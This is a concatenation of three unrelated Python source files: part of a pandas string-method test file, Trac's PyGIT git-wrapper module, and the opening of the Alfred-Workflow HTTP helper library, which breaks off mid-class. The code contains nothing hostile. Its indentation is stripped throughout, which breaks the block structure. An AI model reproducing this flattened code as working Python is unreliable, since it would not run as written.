tm.assert_index_equal(result, expected)
@pytest.mark.parametrize("method", ["partition", "rpartition"])
def test_partition_sep_kwarg(any_string_dtype, method):
# GH 22676; depr kwarg "pat" in favor of "sep"
s = Series(["a_b_c", "c_d_e", np.nan, "f_g_h"], dtype=any_string_dtype)
expected = getattr(s.str, method)(sep="_")
result = getattr(s.str, method)("_")
tm.assert_frame_equal(result, expected)
def test_get():
ser = Series(["a_b_c", "c_d_e", np.nan, "f_g_h"])
result = ser.str.split("_").str.get(1)
expected = Series(["b", "d", np.nan, "g"])
tm.assert_series_equal(result, expected)
def test_get_mixed_object():
ser = Series(["a_b_c", np.nan, "c_d_e", True, datetime.today(), None, 1, 2.0])
result = ser.str.split("_").str.get(1)
expected = Series(["b", np.nan, "d", np.nan, np.nan, np.nan, np.nan, np.nan])
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("idx", [2, -3])
def test_get_bounds(idx):
ser = Series(["1_2_3_4_5", "6_7_8_9_10", "11_12"])
result = ser.str.split("_").str.get(idx)
expected = Series(["3", "8", np.nan])
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize(
"idx, exp", [[2, [3, 3, np.nan, "b"]], [-1, [3, 3, np.nan, np.nan]]]
)
def test_get_complex(idx, exp):
# GH 20671, getting value not in dict raising `KeyError`
ser = Series([(1, 2, 3), [1, 2, 3], {1, 2, 3}, {1: "a", 2: "b", 3: "c"}])
result = ser.str.get(idx)
expected = Series(exp)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("to_type", [tuple, list, np.array])
def test_get_complex_nested(to_type):
ser = Series([to_type([to_type([1, 2])])])
result = ser.str.get(0)
expected = Series([to_type([1, 2])])
tm.assert_series_equal(result, expected)
result = ser.str.get(1)
expected = Series([np.nan])
tm.assert_series_equal(result, expected)
def test_get_strings(any_string_dtype):
ser = Series(["a", "ab", np.nan, "abc"], dtype=any_string_dtype)
result = ser.str.get(2)
expected = Series([np.nan, np.nan, np.nan, "c"], dtype=any_string_dtype)
tm.assert_series_equal(result, expected)
|
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012 Edgewall Software
# Copyright (C) 2006-2011, Herbert Valerio Riedel <hvr@gnu.org>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
from __future__ import with_statement
import os
import codecs
from collections import deque
from contextlib import contextmanager
import cStringIO
from functools import partial
from operator import itemgetter
import re
from subprocess import Popen, PIPE
import sys
from threading import Lock
import time
import weakref
__all__ = ['GitError', 'GitErrorSha', 'Storage', 'StorageFactory']
def terminate(process):
"""Python 2.5 compatibility method.
os.kill is not available on Windows before Python 2.7.
In Python 2.6 subprocess.Popen has a terminate method.
(It also seems to have some issues on Windows though.)
"""
def terminate_win(process):
import ctypes
PROCESS_TERMINATE = 1
handle = ctypes.windll.kernel32.OpenProcess(PROCESS_TERMINATE,
False,
process.pid)
ctypes.windll.kernel32.TerminateProcess(handle, -1)
ctypes.windll.kernel32.CloseHandle(handle)
def terminate_nix(process):
import os
import signal
return os.kill(process.pid, signal.SIGTERM)
if sys.platform == 'win32':
return terminate_win(process)
return terminate_nix(process)
class GitError(Exception):
pass
class GitErrorSha(GitError):
pass
# Helper functions
def parse_commit(raw):
"""Parse the raw content of a commit (as given by `git cat-file -p <rev>`).
Return the commit message and a dict of properties.
"""
if not raw:
raise GitErrorSha
lines = raw.splitlines()
if not lines:
raise GitErrorSha
line = lines.pop(0)
props = {}
multiline = multiline_key = None
while line:
if line[0] == ' ':
if not multiline:
multiline_key = key
multiline = [props[multiline_key][-1]]
multiline.append(line[1:])
else:
key, value = line.split(None, 1)
props.setdefault(key, []).append(value.strip())
line = lines.pop(0)
if multiline and (not line or key != multiline_key):
props[multiline_key][-1] = '\n'.join(multiline)
multiline = None
return '\n'.join(lines), props
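# Illustration (hypothetical raw content, abbreviated shas):
#   raw = "tree 4b82\nparent 9fce\nauthor A <a@example.org> 1 +0000\n\nFix bug"
#   parse_commit(raw) -> ('Fix bug',
#                         {'tree': ['4b82'], 'parent': ['9fce'],
#                          'author': ['A <a@example.org> 1 +0000']})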
class GitCore(object):
"""Low-level wrapper around git executable"""
def __init__(self, git_dir=None, git_bin='git'):
self.__git_bin = git_bin
self.__git_dir = git_dir
def __repr__(self):
return '<GitCore bin="%s" dir="%s">' % (self.__git_bin,
self.__git_dir)
def __build_git_cmd(self, gitcmd, *args):
"""construct command tuple for git call suitable for Popen()"""
cmd = [self.__git_bin]
if self.__git_dir:
cmd.append('--git-dir=%s' % self.__git_dir)
cmd.append(gitcmd)
cmd.extend(args)
return cmd
def __pipe(self, git_cmd, *cmd_args, **kw):
if sys.platform == 'win32':
return Popen(self.__build_git_cmd(git_cmd, *cmd_args), **kw)
else:
return Popen(self.__build_git_cmd(git_cmd, *cmd_args),
close_fds=True, **kw)
def __execute(self, git_cmd, *cmd_args):
"""execute git command and return file-like object of stdout"""
#print >>sys.stderr, "DEBUG:", git_cmd, cmd_args
p = self.__pipe(git_cmd, stdout=PIPE, stderr=PIPE, *cmd_args)
stdout_data, stderr_data = p.communicate()
# TODO: do something with p.returncode, e.g. raise an exception
return stdout_data
def cat_file_batch(self):
return self.__pipe('cat-file', '--batch', stdin=PIPE, stdout=PIPE)
def log_pipe(self, *cmd_args):
return self.__pipe('log', stdout=PIPE, *cmd_args)
def __getattr__(self, name):
if name[0] == '_' or name in ['cat_file_batch', 'log_pipe']:
raise AttributeError, name
return partial(self.__execute, name.replace('_','-'))
__is_sha_pat = re.compile(r'[0-9A-Fa-f]*$')
@classmethod
def is_sha(cls, sha):
"""returns whether sha is a potential sha id
(i.e. proper hexstring between 4 and 40 characters)
"""
# quick test before starting up regexp matcher
if not (4 <= len(sha) <= 40):
return False
return bool(cls.__is_sha_pat.match(sha))
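# e.g. (illustrative): GitCore.is_sha('deadbeef') -> True,
# GitCore.is_sha('abc') -> False (too short),
# GitCore.is_sha('zzzz') -> False (not a hexstring)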
class SizedDict(dict):
"""Size-bounded dictionary with FIFO replacement strategy"""
def __init__(self, max_size=0):
dict.__init__(self)
self.__max_size = max_size
self.__key_fifo = deque()
self.__lock = Lock()
def __setitem__(self, name, value):
with self.__lock:
assert len(self) == len(self.__key_fifo) # invariant
if not self.__contains__(name):
self.__key_fifo.append(name)
rc = dict.__setitem__(self, name, value)
while len(self.__key_fifo) > self.__max_size:
self.__delitem__(self.__key_fifo.popleft())
assert len(self) == len(self.__key_fifo) # invariant
return rc
def setdefault(self, *_):
raise NotImplementedError("SizedDict has no setdefault() method")
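# Usage sketch (illustrative): with max_size=2, inserting 'a', 'b', 'c' in
# that order evicts 'a' first (FIFO), leaving only the two newest keys.
#   cache = SizedDict(2)
#   cache['a'] = 1; cache['b'] = 2; cache['c'] = 3
#   sorted(cache.keys()) -> ['b', 'c']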
class StorageFactory(object):
__dict = weakref.WeakValueDictionary()
__dict_nonweak = dict()
__dict_lock = Lock()
def __init__(self, repo, log, weak=True, git_bin='git',
git_fs_encoding=None):
self.logger = log
with StorageFactory.__dict_lock:
try:
i = StorageFactory.__dict[repo]
except KeyError:
i = Storage(repo, log, git_bin, git_fs_encoding)
StorageFactory.__dict[repo] = i
# create or remove additional reference depending on 'weak'
# argument
if weak:
try:
del StorageFactory.__dict_nonweak[repo]
except KeyError:
pass
else:
StorageFactory.__dict_nonweak[repo] = i
self.__inst = i
self.__repo = repo
def getInstance(self):
is_weak = self.__repo not in StorageFactory.__dict_nonweak
self.logger.debug("requested %sPyGIT.Storage instance %d for '%s'"
% (("","weak ")[is_weak], id(self.__inst),
self.__repo))
return self.__inst
class Storage(object):
"""High-level wrapper around GitCore with in-memory caching"""
__SREV_MIN = 4 # minimum short-rev length
class RevCache(tuple):
"""RevCache(youngest_rev, oldest_rev, rev_dict, tag_set, srev_dict,
branch_dict)
In Python 2.7 this class could be defined by:
from collections import namedtuple
RevCache = namedtuple('RevCache', 'youngest_rev oldest_rev '
'rev_dict tag_set srev_dict '
'branch_dict')
This implementation is what that code generator would produce.
"""
__slots__ = ()
_fields = ('youngest_rev', 'oldest_rev', 'rev_dict', 'tag_set',
'srev_dict', 'branch_dict')
def __new__(cls, youngest_rev, oldest_rev, rev_dict, tag_set,
srev_dict, branch_dict):
return tuple.__new__(cls, (youngest_rev, oldest_rev, rev_dict,
tag_set, srev_dict, branch_dict))
@classmethod
def _make(cls, iterable, new=tuple.__new__, len=len):
"""Make a new RevCache object from a sequence or iterable"""
result = new(cls, iterable)
if len(result) != 6:
raise TypeError('Expected 6 arguments, got %d' % len(result))
return result
def __repr__(self):
return 'RevCache(youngest_rev=%r, oldest_rev=%r, rev_dict=%r, ' \
'tag_set=%r, srev_dict=%r, branch_dict=%r)' % self
def _asdict(t):
"""Return a new dict which maps field names to their values"""
return {'youngest_rev': t[0], 'oldest_rev': t[1],
'rev_dict': t[2], 'tag_set': t[3], 'srev_dict': t[4],
'branch_dict': t[5]}
def _replace(self, **kwds):
"""Return a new RevCache object replacing specified fields with
new values
"""
result = self._make(map(kwds.pop, ('youngest_rev', 'oldest_rev',
'rev_dict', 'tag_set', 'srev_dict', 'branch_dict'), self))
if kwds:
raise ValueError("Got unexpected field names: %r"
% kwds.keys())
return result
def __getnewargs__(self):
return tuple(self)
youngest_rev = property(itemgetter(0))
oldest_rev = property(itemgetter(1))
rev_dict = property(itemgetter(2))
tag_set = property(itemgetter(3))
srev_dict = property(itemgetter(4))
branch_dict = property(itemgetter(5))
@staticmethod
def __rev_key(rev):
assert len(rev) >= 4
#assert GitCore.is_sha(rev)
srev_key = int(rev[:4], 16)
assert srev_key >= 0 and srev_key <= 0xffff
return srev_key
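# e.g. (illustrative): __rev_key('deadbeef...') -> int('dead', 16) == 57005,
# i.e. all revs sharing the first four hex digits land in the same bucket.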
@staticmethod
def git_version(git_bin='git'):
GIT_VERSION_MIN_REQUIRED = (1, 5, 6)
try:
g = GitCore(git_bin=git_bin)
[v] = g.version().splitlines()
version = v.strip().split()[2]
# 'version' has usually at least 3 numeric version
# components, e.g.::
# 1.5.4.2
# 1.5.4.3.230.g2db511
# 1.5.4.GIT
def try_int(s):
try:
return int(s)
except ValueError:
return s
split_version = tuple(map(try_int, version.split('.')))
result = {}
result['v_str'] = version
result['v_tuple'] = split_version
result['v_min_tuple'] = GIT_VERSION_MIN_REQUIRED
result['v_min_str'] = ".".join(map(str, GIT_VERSION_MIN_REQUIRED))
result['v_compatible'] = split_version >= GIT_VERSION_MIN_REQUIRED
return result
except Exception, e:
raise GitError("Could not retrieve GIT version (tried to "
"execute/parse '%s --version' but got %s)"
% (git_bin, repr(e)))
def __init__(self, git_dir, log, git_bin='git', git_fs_encoding=None):
"""Initialize PyGit.Storage instance
`git_dir`: path to .git folder;
this setting is not affected by the `git_fs_encoding` setting
`log`: logger instance
`git_bin`: path to executable
this setting is not affected by the `git_fs_encoding` setting
`git_fs_encoding`: encoding used for paths stored in git repository;
if `None`, no implicit decoding/encoding to/from
unicode objects is performed, and bytestrings are
returned instead
"""
self.logger = log
self.commit_encoding = None
# caches
self.__rev_cache = None
self.__rev_cache_lock = Lock()
# cache the last 200 commit messages
self.__commit_msg_cache = SizedDict(200)
self.__commit_msg_lock = Lock()
self.__cat_file_pipe = None
self.__cat_file_pipe_lock = Lock()
if git_fs_encoding is not None:
# validate encoding name
codecs.lookup(git_fs_encoding)
# setup conversion functions
self._fs_to_unicode = lambda s: s.decode(git_fs_encoding)
self._fs_from_unicode = lambda s: s.encode(git_fs_encoding)
else:
# pass bytestrings as-is w/o any conversion
self._fs_to_unicode = self._fs_from_unicode = lambda s: s
# simple sanity checking
__git_file_path = partial(os.path.join, git_dir)
if not all(map(os.path.exists,
map(__git_file_path,
['HEAD','objects','refs']))):
self.logger.error("GIT control files missing in '%s'" % git_dir)
if os.path.exists(__git_file_path('.git')):
self.logger.error("entry '.git' found in '%s'"
" -- maybe use that folder instead..."
% git_dir)
raise GitError("GIT control files not found, maybe wrong "
"directory?")
self.repo = GitCore(git_dir, git_bin=git_bin)
self.logger.debug("PyGIT.Storage instance %d constructed" % id(self))
def __del__(self):
with self.__cat_file_pipe_lock:
if self.__cat_file_pipe is not None:
self.__cat_file_pipe.stdin.close()
terminate(self.__cat_file_pipe)
self.__cat_file_pipe.wait()
#
# cache handling
#
# called by Storage.sync()
def __rev_cache_sync(self, youngest_rev=None):
"""invalidates revision db cache if necessary"""
with self.__rev_cache_lock:
need_update = False
if self.__rev_cache:
last_youngest_rev = self.__rev_cache.youngest_rev
if last_youngest_rev != youngest_rev:
self.logger.debug("invalidated caches (%s != %s)"
% (last_youngest_rev, youngest_rev))
need_update = True
else:
need_update = True # almost NOOP
if need_update:
self.__rev_cache = None
return need_update
def get_rev_cache(self):
"""Retrieve revision cache
may rebuild cache on the fly if required
returns RevCache tuple
"""
with self.__rev_cache_lock:
if self.__rev_cache is None:
# can be cleared by Storage.__rev_cache_sync()
self.logger.debug("triggered rebuild of commit tree db "
"for %d" % id(self))
ts0 = time.time()
youngest = None
oldest = None
new_db = {} # db
new_sdb = {} # short_rev db
# helper for reusing strings
__rev_seen = {}
def __rev_reuse(rev):
rev = str(rev)
return __rev_seen.setdefault(rev, rev)
new_tags = set(__rev_reuse(rev.strip())
for rev in self.repo.rev_parse('--tags')
.splitlines())
new_branches = [(k, __rev_reuse(v))
for k, v in self._get_branches()]
head_revs = set(v for _, v in new_branches)
rev = ord_rev = 0
for ord_rev, revs in enumerate(
self.repo.rev_list('--parents',
'--topo-order',
'--all')
.splitlines()):
revs = map(__rev_reuse, revs.strip().split())
rev = revs[0]
# first rev seen is assumed to be the youngest one
if not ord_rev:
youngest = rev
# shortrev "hash" map
srev_key = self.__rev_key(rev)
new_sdb.setdefault(srev_key, []).append(rev)
# parents
parents = tuple(revs[1:])
# new_db[rev] = (children(rev), parents(rev),
# ordinal_id(rev), rheads(rev))
if rev in new_db:
# (incomplete) entry was already created by children
_children, _parents, _ord_rev, _rheads = new_db[rev]
assert _children
assert not _parents
assert _ord_rev == 0
if rev in head_revs and rev not in _rheads:
_rheads.append(rev)
else: # new entry
_children = []
_rheads = [rev] if rev in head_revs else []
# create/update entry
# transform lists into tuples since entry will be final
new_db[rev] = tuple(_children), tuple(parents), \
ord_rev + 1, tuple(_rheads)
# update parents(rev)s
for parent in parents:
# by default, a dummy ordinal_id is used
# for the mean-time
_children, _parents, _ord_rev, _rheads2 = \
new_db.setdefault(parent, ([], [], 0, []))
# update parent(rev)'s children
if rev not in _children:
_children.append(rev)
# update parent(rev)'s rheads
for rev in _rheads:
if rev not in _rheads2:
_rheads2.append(rev)
# last rev seen is assumed to be the oldest
# one (with highest ord_rev)
oldest = rev
__rev_seen = None
# convert sdb either to dict or array depending on size
tmp = [()]*(max(new_sdb.keys())+1) \
if len(new_sdb) > 5000 else {}
try:
while True:
k, v = new_sdb.popitem()
tmp[k] = tuple(v)
except KeyError:
pass
assert len(new_sdb) == 0
new_sdb = tmp
# atomically update self.__rev_cache
self.__rev_cache = Storage.RevCache(youngest, oldest, new_db,
new_tags, new_sdb,
new_branches)
ts1 = time.time()
self.logger.debug("rebuilt commit tree db for %d with %d "
"entries (took %.1f ms)"
% (id(self), len(new_db), 1000*(ts1-ts0)))
assert all(e is not None for e in self.__rev_cache) \
or not any(self.__rev_cache)
return self.__rev_cache
# with self.__rev_cache_lock
# see RevCache namedtuple
rev_cache = property(get_rev_cache)
def _get_branches(self):
"""returns list of (local) branches, with active (= HEAD) one being
the first item
"""
result = []
for e in self.repo.branch('-v', '--no-abbrev').splitlines():
bname, bsha = e[1:].strip().split()[:2]
if e.startswith('*'):
result.insert(0, (bname, bsha))
else:
result.append((bname, bsha))
return result
def get_branches(self):
"""returns list of (local) branches, with active (= HEAD) one being
the first item
"""
return ((self._fs_to_unicode(name), sha)
for name, sha in self.rev_cache.branch_dict)
def get_commits(self):
return self.rev_cache.rev_dict
def oldest_rev(self):
return self.rev_cache.oldest_rev
def youngest_rev(self):
return self.rev_cache.youngest_rev
def get_branch_contains(self, sha, resolve=False):
"""return list of reachable head sha ids or (names, sha) pairs if
resolve is true
see also get_branches()
"""
_rev_cache = self.rev_cache
try:
rheads = _rev_cache.rev_dict[sha][3]
except KeyError:
return []
if resolve:
return ((self._fs_to_unicode(k), v)
for k, v in _rev_cache.branch_dict if v in rheads)
return rheads
def history_relative_rev(self, sha, rel_pos):
db = self.get_commits()
if sha not in db:
raise GitErrorSha()
if rel_pos == 0:
return sha
lin_rev = db[sha][2] + rel_pos
if lin_rev < 1 or lin_rev > len(db):
return None
for k, v in db.iteritems():
if v[2] == lin_rev:
return k
# should never be reached if db is consistent
raise GitError("internal inconsistency detected")
def hist_next_revision(self, sha):
return self.history_relative_rev(sha, -1)
def hist_prev_revision(self, sha):
return self.history_relative_rev(sha, +1)
def get_commit_encoding(self):
if self.commit_encoding is None:
self.commit_encoding = \
self.repo.repo_config("--get", "i18n.commitEncoding") \
.strip() or 'utf-8'
return self.commit_encoding
def head(self):
"""get current HEAD commit id"""
return self.verifyrev('HEAD')
def cat_file(self, kind, sha):
with self.__cat_file_pipe_lock:
if self.__cat_file_pipe is None:
self.__cat_file_pipe = self.repo.cat_file_batch()
try:
self.__cat_file_pipe.stdin.write(sha + '\n')
self.__cat_file_pipe.stdin.flush()
split_stdout_line = self.__cat_file_pipe.stdout.readline() \
.split()
if len(split_stdout_line) != 3:
raise GitError("internal error (could not split line "
"'%s')" % (split_stdout_line,))
_sha, _type, _size = split_stdout_line
if _type != kind:
raise GitError("internal error (got unexpected object "
"kind '%s', expected '%s')"
% (_type, kind))
size = int(_size)
return self.__cat_file_pipe.stdout.read(size + 1)[:size]
except:
# There was an error; close the pipe to get back to a
# consistent state (otherwise the next cat_file call may read
# leftover payload from this one)
self.logger.debug("closing cat_file pipe")
self.__cat_file_pipe.stdin.close()
terminate(self.__cat_file_pipe)
self.__cat_file_pipe.wait()
self.__cat_file_pipe = None
def verifyrev(self, rev):
"""verify/lookup given revision object and return a sha id or None
if lookup failed
"""
rev = self._fs_from_unicode(rev)
_rev_cache = self.rev_cache
if GitCore.is_sha(rev):
# maybe it's a short or full rev
fullrev = self.fullrev(rev)
if fullrev:
return fullrev
# fall back to external git calls
rc = self.repo.rev_parse('--verify', rev).strip()
if not rc:
return None
if rc in _rev_cache.rev_dict:
return rc
if rc in _rev_cache.tag_set:
sha = self.cat_file('tag', rc).split(None, 2)[:2]
if sha[0] != 'object':
self.logger.debug("unexpected result from 'git-cat-file tag "
"%s'" % rc)
return None
return sha[1]
return None
def shortrev(self, rev, min_len=7):
"""try to shorten sha id"""
#try to emulate the following:
#return self.repo.rev_parse("--short", str(rev)).strip()
rev = str(rev)
if min_len < self.__SREV_MIN:
min_len = self.__SREV_MIN
_rev_cache = self.rev_cache
if rev not in _rev_cache.rev_dict:
return None
srev = rev[:min_len]
srevs = set(_rev_cache.srev_dict[self.__rev_key(rev)])
if len(srevs) == 1:
return srev # we already got a unique id
# find a shortened id for which rev doesn't conflict with
# the other ones from srevs
crevs = srevs - set([rev])
for l in range(min_len+1, 40):
srev = rev[:l]
if srev not in [ r[:l] for r in crevs ]:
return srev
return rev # worst-case, all except the last character match
def fullrev(self, srev):
"""try to reverse shortrev()"""
srev = str(srev)
_rev_cache = self.rev_cache
# short-cut
if len(srev) == 40 and srev in _rev_cache.rev_dict:
return srev
if not GitCore.is_sha(srev):
return None
try:
srevs = _rev_cache.srev_dict[self.__rev_key(srev)]
except KeyError:
return None
srevs = filter(lambda s: s.startswith(srev), srevs)
if len(srevs) == 1:
return srevs[0]
return None
def get_tags(self):
return (self._fs_to_unicode(e.strip())
for e in self.repo.tag('-l').splitlines())
def ls_tree(self, rev, path=''):
rev = rev and str(rev) or 'HEAD' # paranoia
path = self._fs_from_unicode(path)
if path.startswith('/'):
path = path[1:]
tree = self.repo.ls_tree('-z', '-l', rev, '--', path).split('\0')
def split_ls_tree_line(l):
"""split according to '<mode> <type> <sha> <size>\t<fname>'"""
meta, fname = l.split('\t', 1)
_mode, _type, _sha, _size = meta.split()
if _size == '-':
_size = None
else:
_size = int(_size)
return _mode, _type, _sha, _size, self._fs_to_unicode(fname)
return [ split_ls_tree_line(e) for e in tree if e ]
def read_commit(self, commit_id):
if not commit_id:
raise GitError("read_commit called with empty commit_id")
commit_id, commit_id_orig = self.fullrev(commit_id), commit_id
db = self.get_commits()
if commit_id not in db:
self.logger.info("read_commit failed for '%s' ('%s')" %
(commit_id, commit_id_orig))
raise GitErrorSha
with self.__commit_msg_lock:
if self.__commit_msg_cache.has_key(commit_id):
# cache hit
result = self.__commit_msg_cache[commit_id]
return result[0], dict(result[1])
# cache miss
raw = self.cat_file('commit', commit_id)
raw = unicode(raw, self.get_commit_encoding(), 'replace')
result = parse_commit(raw)
self.__commit_msg_cache[commit_id] = result
return result[0], dict(result[1])
def get_file(self, sha):
return cStringIO.StringIO(self.cat_file('blob', str(sha)))
def get_obj_size(self, sha):
sha = str(sha)
try:
obj_size = int(self.repo.cat_file('-s', sha).strip())
except ValueError:
raise GitErrorSha("object '%s' not found" % sha)
return obj_size
def children(self, sha):
db = self.get_commits()
try:
return list(db[sha][0])
except KeyError:
return []
def children_recursive(self, sha, rev_dict=None):
"""Recursively traverse children in breadth-first order"""
if rev_dict is None:
rev_dict = self.get_commits()
work_list = deque()
seen = set()
seen.update(rev_dict[sha][0])
work_list.extend(rev_dict[sha][0])
while work_list:
p = work_list.popleft()
yield p
_children = set(rev_dict[p][0]) - seen
seen.update(_children)
work_list.extend(_children)
assert len(work_list) == 0
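# Sketch (hypothetical rev_dict; children are stored at index 0 of each entry):
#   rev_dict = {'a': (('b', 'c'),), 'b': (('d',),), 'c': ((),), 'd': ((),)}
#   list(storage.children_recursive('a', rev_dict)) -> ['b', 'c', 'd']
# i.e. descendants are yielded breadth-first, each exactly once.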
def parents(self, sha):
db = self.get_commits()
try:
return list(db[sha][1])
except KeyError:
return []
def all_revs(self):
return self.get_commits().iterkeys()
def sync(self):
rev = self.repo.rev_list('--max-count=1', '--topo-order', '--all') \
.strip()
return self.__rev_cache_sync(rev)
@contextmanager
def get_historian(self, sha, base_path):
p = []
change = {}
next_path = []
def name_status_gen():
p[:] = [self.repo.log_pipe('--pretty=format:%n%H',
'--name-status', sha, '--', base_path)]
f = p[0].stdout
for l in f:
if l == '\n':
continue
old_sha = l.rstrip('\n')
for l in f:
if l == '\n':
break
_, path = l.rstrip('\n').split('\t', 1)
while path not in change:
change[path] = old_sha
if next_path == [path]:
yield old_sha
try:
path, _ = path.rsplit('/', 1)
except ValueError:
break
f.close()
terminate(p[0])
p[0].wait()
p[:] = []
while True:
yield None
gen = name_status_gen()
def historian(path):
try:
return change[path]
except KeyError:
next_path[:] = [path]
return gen.next()
yield historian
if p:
p[0].stdout.close()
terminate(p[0])
p[0].wait()
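# A hypothetical usage sketch: the historian closure caches a single
# `git log --name-status` walk, so repeated last-change lookups under
# `base_path` avoid spawning one rev-list per path.
#
#   with storage.get_historian(sha, 'trunk') as historian:
#       last = storage.last_change(sha, 'trunk/README', historian)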
def last_change(self, sha, path, historian=None):
if historian is not None:
return historian(path)
return self.repo.rev_list('--max-count=1',
sha, '--',
self._fs_from_unicode(path)).strip() or None
def history(self, sha, path, limit=None):
if limit is None:
limit = -1
tmp = self.repo.rev_list('--max-count=%d' % limit, str(sha), '--',
self._fs_from_unicode(path))
return [ rev.strip() for rev in tmp.splitlines() ]
def history_timerange(self, start, stop):
return [ rev.strip() for rev in \
self.repo.rev_list('--reverse',
'--max-age=%d' % start,
'--min-age=%d' % stop,
'--all').splitlines() ]
def rev_is_anchestor_of(self, rev1, rev2):
"""return True if rev2 is a descendant (successor) of rev1"""
rev1 = rev1.strip()
rev2 = rev2.strip()
rev_dict = self.get_commits()
return (rev2 in rev_dict and
rev2 in self.children_recursive(rev1, rev_dict))
def blame(self, commit_sha, path):
in_metadata = False
path = self._fs_from_unicode(path)
for line in self.repo.blame('-p', '--', path, str(commit_sha)) \
.splitlines():
assert line
if in_metadata:
in_metadata = not line.startswith('\t')
else:
split_line = line.split()
if len(split_line) == 4:
(sha, orig_lineno, lineno, group_size) = split_line
else:
(sha, orig_lineno, lineno) = split_line
assert len(sha) == 40
yield (sha, lineno)
in_metadata = True
assert not in_metadata
def diff_tree(self, tree1, tree2, path='', find_renames=False):
"""calls `git diff-tree` and returns tuples of the kind
(mode1,mode2,obj1,obj2,action,path1,path2)"""
# diff-tree returns records with the following structure:
# :<old-mode> <new-mode> <old-sha> <new-sha> <change> NUL <old-path> NUL [ <new-path> NUL ]
path = self._fs_from_unicode(path).strip('/')
diff_tree_args = ['-z', '-r']
if find_renames:
diff_tree_args.append('-M')
diff_tree_args.extend([str(tree1) if tree1 else '--root',
str(tree2),
'--', path])
lines = self.repo.diff_tree(*diff_tree_args).split('\0')
assert lines[-1] == ''
del lines[-1]
if tree1 is None and lines:
# if only one tree-sha is given on commandline,
# the first line is just the redundant tree-sha itself...
assert not lines[0].startswith(':')
del lines[0]
# FIXME: the following code is ugly, needs rewrite
chg = None
def __chg_tuple():
if len(chg) == 6:
chg.append(None)
else:
chg[6] = self._fs_to_unicode(chg[6])
chg[5] = self._fs_to_unicode(chg[5])
assert len(chg) == 7
return tuple(chg)
for line in lines:
if line.startswith(':'):
if chg:
yield __chg_tuple()
chg = line[1:].split()
assert len(chg) == 5
else:
chg.append(line)
# handle left-over chg entry
if chg:
yield __chg_tuple()
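# A hypothetical usage sketch: consume the change records yielded by
# diff_tree(); `action` is one of git's status letters (A, D, M, R...).
#
#   for _mode1, _mode2, _obj1, _obj2, action, path1, path2 in \
#           storage.diff_tree(parent_sha, commit_sha):
#       print action, path1, path2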
|
|
# encoding: utf-8
#
# Copyright (c) 2014 Dean Jackson <deanishe@deanishe.net>
#
# MIT Licence. See http://opensource.org/licenses/MIT
#
# Created on 2014-02-15
#
"""
A lightweight HTTP library with a requests-like interface.
"""
from __future__ import print_function
import codecs
import json
import mimetypes
import os
import random
import re
import socket
import string
import unicodedata
import urllib
import urllib2
import urlparse
import zlib
USER_AGENT = u'Alfred-Workflow/1.11 (http://www.deanishe.net)'
# Valid characters for multipart form data boundaries
BOUNDARY_CHARS = string.digits + string.ascii_letters
# HTTP response codes
RESPONSES = {
100: 'Continue',
101: 'Switching Protocols',
200: 'OK',
201: 'Created',
202: 'Accepted',
203: 'Non-Authoritative Information',
204: 'No Content',
205: 'Reset Content',
206: 'Partial Content',
300: 'Multiple Choices',
301: 'Moved Permanently',
302: 'Found',
303: 'See Other',
304: 'Not Modified',
305: 'Use Proxy',
307: 'Temporary Redirect',
400: 'Bad Request',
401: 'Unauthorized',
402: 'Payment Required',
403: 'Forbidden',
404: 'Not Found',
405: 'Method Not Allowed',
406: 'Not Acceptable',
407: 'Proxy Authentication Required',
408: 'Request Timeout',
409: 'Conflict',
410: 'Gone',
411: 'Length Required',
412: 'Precondition Failed',
413: 'Request Entity Too Large',
414: 'Request-URI Too Long',
415: 'Unsupported Media Type',
416: 'Requested Range Not Satisfiable',
417: 'Expectation Failed',
500: 'Internal Server Error',
501: 'Not Implemented',
502: 'Bad Gateway',
503: 'Service Unavailable',
504: 'Gateway Timeout',
505: 'HTTP Version Not Supported'
}
def str_dict(dic):
"""Convert keys and values in ``dic`` into UTF-8-encoded :class:`str`
:param dic: :class:`dict` of Unicode strings
:returns: :class:`dict`
"""
if isinstance(dic, CaseInsensitiveDictionary):
dic2 = CaseInsensitiveDictionary()
else:
dic2 = {}
for k, v in dic.items():
if isinstance(k, unicode):
k = k.encode('utf-8')
if isinstance(v, unicode):
v = v.encode('utf-8')
dic2[k] = v
return dic2
class NoRedirectHandler(urllib2.HTTPRedirectHandler):
"""Prevent redirections"""
def redirect_request(self, *args):
return None
# Adapted from https://gist.github.com/babakness/3901174
class CaseInsensitiveDictionary(dict):
"""
Dictionary that enables case-insensitive searching while preserving
case sensitivity when keys are listed, i.e., via the keys() or items() methods.
Works by storing a lowercase version of the key as the new key and
stores the original key-value pair as the key's value
(values become dictionaries).
"""
def __init__(self, initval=None):
if isinstance(initval, dict):
for key, value in initval.iteritems():
self.__setitem__(key, value)
elif isinstance(initval, list):
for (key, value) in initval:
self.__setitem__(key, value)
def __contains__(self, key):
return dict.__contains__(self, key.lower())
def __getitem__(self, key):
return dict.__getitem__(self, key.lower())['val']
def __setitem__(self, key, value):
return dict.__setitem__(self, key.lower(), {'key': key, 'val': value})
def get(self, key, default=None):
try:
v = dict.__getitem__(self, key.lower())
except KeyError:
return default
else:
return v['val']
def update(self, other):
for k, v in other.items():
self[k] = v
def items(self):
return [(v['key'], v['val']) for v in dict.itervalues(self)]
def keys(self):
return [v['key'] for v in dict.itervalues(self)]
def values(self):
return [v['val'] for v in dict.itervalues(self)]
def iteritems(self):
for v in dict.itervalues(self):
yield v['key'], v['val']
def iterkeys(self):
for v in dict.itervalues(self):
yield v['key']
def itervalues(self):
for v in dict.itervalues(self):
yield v['val']
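# A minimal sketch of the case-insensitive behaviour (hypothetical values):
#
#   d = CaseInsensitiveDictionary({'Content-Type': 'text/html'})
#   d['content-type']   # -> 'text/html' (lookups ignore case)
#   d.keys()            # -> ['Content-Type'] (original case preserved)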
class Response(object):
"""
Returned by :func:`request` / :func:`get` / :func:`post` functions.
A simplified version of the ``Response`` object in the ``requests`` library.
>>> r = request('http://www.google.com')
>>> r.status_code
200
>>> r.encoding
ISO-8859-1
>>> r.content # bytes
<html> ...
>>> r.text # unicode, decoded according to charset in HTTP header/meta tag
u'<html> ...'
>>> r.json() # content parsed as JSON
"""
def __init__(self, request):
